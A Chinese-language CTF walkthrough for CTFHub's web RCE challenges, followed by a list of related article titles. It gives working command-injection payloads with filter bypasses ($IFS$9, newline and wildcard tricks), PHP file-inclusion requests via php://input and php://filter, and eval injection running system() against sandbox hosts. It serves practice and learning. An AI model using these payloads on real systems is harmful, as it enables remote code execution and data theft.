目录

  • 命令注入
  • 过滤cat
  • 过滤空格
  • 过滤目录分隔符
  • 过滤运算符
  • 命令注入-综合练习
  • 文件包含
  • php://input
  • 远程包含
  • 读取源代码
  • eval执行

命令注入

输入

127.0.0.1 | ls -al

查看文件

127.0.0.1 | cat [flag文件名]

过滤cat

用less more就行

过滤空格

$IFS$9

代替空格,然后输入

127.0.0.1|cat$IFS$9lag_3760913111752.php

过滤目录分隔符

127.0.0.1;cd flag_is_here;cat flag_11132792223723.php

过滤运算符

127.0.0.1;cat flag_209472690126349.php

命令注入-综合练习

先输入这个显示flag文件所在位置,注意把flag写成通配符

http://challenge-d810582d3784c897.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0acd$IFS$9fla*_is_here%0als$IFS$9-al

最后答案

http://challenge-d810582d3784c897.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0acd$IFS$9fla*_is_here%0amore$IFS$9fla*_8941778912527.php

文件包含

这道题get与post结合起来

get如下

http://challenge-647375ee75c1e32b.sandbox.ctfhub.com:10080/?file=shell.txt

post如下

ctfhub=system("cat /flag");

参考文章:
https://blog.csdn.net/Xxy605/article/details/107556509

https://winny.work/ctfhub技能树_web_rce之eval、文件包含/680.html

查找flag

find / -name flag*

php://input

用burp拦截,发送到Repeater,然后构造post请求

POST /?file=php://input HTTP/1.1
Host: challenge-b6e75eaa899f147c.sandbox.ctfhub.com:10080
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Length: 38<?php system('find / -name *flag*');?>

找到flag文件,输出

证明是可以使用php://input

远程包含

这里POST与GET都可以,为什么呢?

GET /?file=php://input HTTP/1.1
Host: challenge-4c672ad46ce5abfc.sandbox.ctfhub.com:10080
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Length: 29<?php system('cat /flag*');?>

读取源代码

POST /?file=php://filter/resource=/flag HTTP/1.1
Host: challenge-bcf11eabbe47b7f4.sandbox.ctfhub.com:10080
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Length: 0

另外一种答案

POST /?file=php://filter/read=convert.base64-encode/resource=/flag HTTP/1.1
Host: challenge-bcf11eabbe47b7f4.sandbox.ctfhub.com:10080
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Length: 0

eval执行

http://challenge-88b4fef25925e427.sandbox.ctfhub.com:10080/?cmd=system("find / -name *flag*");

找到flag文件

http://challenge-88b4fef25925e427.sandbox.ctfhub.com:10080/?cmd=system("cat /flag_29995");

[CTFHub] Web RCE Write ups相关推荐

  1. Ctfhub解题 web RCE

    Ctfhub解题 web RCE 1. eval执行 2.文件包含 3.php://input 4.读取源代码 5.远程包含 6.命令注入 7.过滤cat 8.过滤空格 9.过滤目录分隔符 10.过滤 ...

  2. CTFHub——Web技能树

    文章目录 信息泄露 目录遍历 PHPINFO 备份文件下载 Git泄露 SVN泄露 HG泄露 SQL注入 整型注入 字符型注入 报错注入 布尔盲注 时间盲注 MySQL结构 cookie注入 UA注入 ...

  3. CTFHub web 文件上传- 无限制

    CTFHub 文件上传 - 无限制 上传一个含一句话木马的.jpg文件,抓包后将.jpg改为.php后上传,go一下即可 然后再之前的路径后面加上upload/.php的路径,就可以了 这是我们上传的 ...

  4. CTFHub Web真题(7星)

    文章目录 七星难度 SQL注入-2(字符布尔盲注) namp(nmap命令注入) shrine(Jinja SSTI) Web1(sql注入过滤) easy_login(nodejs JWT攻击) 七 ...

  5. APC UPS电源管理在机房的应用

    在日常工作中,我们有过突然断电造成工作中断的经历,让人很懊恼,如果提前做准备,那么会减少很大损失.在服务器操作系统中都有电源管理的选项,服务器可以通过串口跟UPS连接,对UPS进行管理,查看工作日志, ...

  6. 第十届极客大挑战——部分web和RE的WP

    第十届极客大挑战--部分web和RE的WP 昨天刚刚搞完湖湘杯和软考,累的一批,,,,湖湘杯的wp就不写了,写写这个wp 这个好像是一个月之前就开始的,打了一个月,不断的放题,题也做了不少,,, 其他 ...

  7. 主机端的入侵检测,难啃到让人想放弃!

    青藤云安全,江湖人称"藤厂",凭借领先的理念.技术和产品在网络安全圈逐步封神,久战而立于不败之地.为了让更多人了解青藤.了解网络安全,笔者特开通此专栏,争取用简洁明了的语言讲清楚晦 ...

  8. Linux(CentOS)下,各种协议,端口号

    Linux(CentOS)下,各种配置文件如下: DNS:cat /etc/resolv.conf 主机名:cat etc/sysconfig/network 私有主机名:cat /etc/hosts ...

  9. 一、CTF-Web-信息泄露(记录CTF学习)

    目录 1.源码泄露 1-1.页面源代码泄露 1-2.敏感文件泄露 1-2-1.备份(.swp/.bak/.beifen/~/phps等) 1-2-2.数据库(mdb) 1-2-3.压缩包(zip/ta ...

  10. xss平台详解及练习

    文章目录 xss平台使用教程 练习 CTFhub web 反射型xss XSS平台 xss平台使用教程 xss平台使用教程 练习 CTFhub web 反射型xss 在第一栏处输入测试语句 <s ...

最新文章

  1. lr java脚本_【上海校区】 LR Java脚本编写方法
  2. java javadoc_使用Java 9向Javadoc搜索添加术语
  3. LeetCode 348. 判定井字棋胜负(计数)
  4. 电脑硬件检测_【学无止境】电脑硬件维修测试学习资料(附送各类PC检修资源)...
  5. c++101rule
  6. Spring Boot 揭秘与实战(二) 数据缓存篇 - Guava Cache
  7. vba自动生成html,动态生成嵌入在VBA电子邮件生成中的HTML表
  8. 实现带有拉普拉斯修正的朴素贝叶斯_数据科学 | 算法工程师必备的机器学习贝叶斯分类器...
  9. 计算机更换硬盘键盘鼠标不好使,安装win7时鼠标键盘不能用怎么办?(完美解决方法)...
  10. 主存空间的分配和回收实验报告
  11. Android 仿QQ好友列表功能实现
  12. PM应具备的规划技巧-顾客价值管理
  13. 石溪分校 计算机研究生专业,纽约州立石溪分校 - 985本科申请纽约州立大学石溪分校计算机研究生容易吗?要准备什么?还有如果成功了好毕业吗??...
  14. 【跨域】一篇文章彻底解决跨域设置cookie问题!
  15. 什么是stub文件_stub code
  16. IntelliJ idea (最新版)激活方法
  17. 计算机鼠标游戏教学法,小学信息技术游戏型教学法初探
  18. php获取网卡网速,Golang 获取网卡时时带宽,可用于测速
  19. Java从零开始实现导出excel(一)
  20. uedit php,laravel uedit上传oss

热门文章

  1. python 人民币兑美元汇率_人民币汇率转换(python人民币和美元转换)
  2. unity利用帧动画制作特效
  3. echarts 实现晶体球面投影
  4. 基于蓝墨云班课的翻转课堂实践
  5. element技巧之element的dialog弹出框可拖拽、可拉伸、可全屏并处理边界问题
  6. 水晶报表的宽度调整方法(设计器、代码调整、rpt文件属性)
  7. 如何检查有哪些尝试入侵服务器IP?有哪些命令?
  8. 2021最新调查报告来了!揭露中国程序员工作和生活真实现状
  9. 用心成就精品海天讲述不一样的品牌故事
  10. android手机内存单位 吉字节,Android8.1 吉字节问题